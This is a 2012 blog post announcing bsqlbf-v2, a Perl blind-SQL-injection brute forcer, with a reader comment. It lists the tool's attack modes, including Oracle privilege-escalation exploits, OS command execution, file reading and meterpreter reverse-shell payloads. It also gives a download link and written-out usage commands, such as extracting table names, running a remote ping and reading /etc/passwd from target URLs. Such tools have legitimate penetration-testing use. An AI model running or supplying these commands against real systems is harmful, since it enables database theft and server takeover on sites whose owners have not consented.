<>
Wednesday, October 10, 2012

bsqlbf-v2 - Blind Sql Injection Brute Forcer version 2


This is a modified version of 'bsqlbfv1.2-th.pl'. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
The tool supports 8 attack modes(-type switch):-

Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.
Download -
bsqlbf-v2-7.pl

Download other versions from here -
http://code.google.com/p/bsqlbf-v2/downloads/list



Usage example:
$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"

User Interface:
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl 
 
// Blind SQL injection brute forcer \\ //originally written by...aramosf@514.es \\ // mofified by sid-at-notsosecure.com \\ // http://www.notsosecure.com \\ ---------------------usage:-------------------------------------------
Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options) String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options) ------------------------------------options:-------------------------- -sql: valid SQL syntax to get; version(), database(), (select table_name from inforamtion_schema.tables limit 1 offset 0) -get: If MySQL user is root, supply word readable file name -blind: parameter to inject sql. Default is last value of url -match: *RECOMMENDED* string to match in valid query, Default is auto -start: if you know the beginning of the string, use it. -length: maximum length of value. Default is 32. -time: timer options: 0: dont wait. Default option. 1: wait 15 seconds 2: wait 5 minutes
-type: Type of injection: 0: Type 0 (default) is blind injection based on True and False responses 1: Type 1 is blind injection based on True and Error responses 2: Type 2 is injection in order by and group by 3: Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit) 4: Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit) 5: Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)
-file: File to read (default C:\boot.ini)
-stype: How you want to execute command: 0: SType 0 (default) is based on java..will NOT work against XE 1: SType 1 is against oracle 9 with plsql_native_make_utility 2: SType 2 is against oracle 10 with dbms_scheduler -database: Backend database: 0: MS-SQL (Default) 1: MYSQL 2: POSTGRES 3: ORACLE -rtime: wait random seconds, for example: "10-20". -method: http method to use; get or post. Default is GET. -cmd: command to execute(type 4 only). Default is "ping 127.0.0.1." -uagent: http UserAgent header to use. Default is bsqlbf 2.3 -ruagent: file with random http UserAgent header to use. -cookie: http cookie header to use -rproxy: use random http proxy from file list. -proxy: use proxy http. Syntax -proxy=http://proxy:port/ -proxy_user: proxy http user -proxy_pass: proxy http password
---------------------------- examples:------------------------------- bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1
bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"

1 comments:

  1. THanks - very nice script! Another helpful article on blind sql injection:

    http://www.programmerinterview.com/index.php/database-sql/blind-sql-injection/

    ReplyDelete
:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

Welcome Back Visitor! Your Last Visit Was on Wed, Aug 6, 2025 09:13:34 PM
 
TOP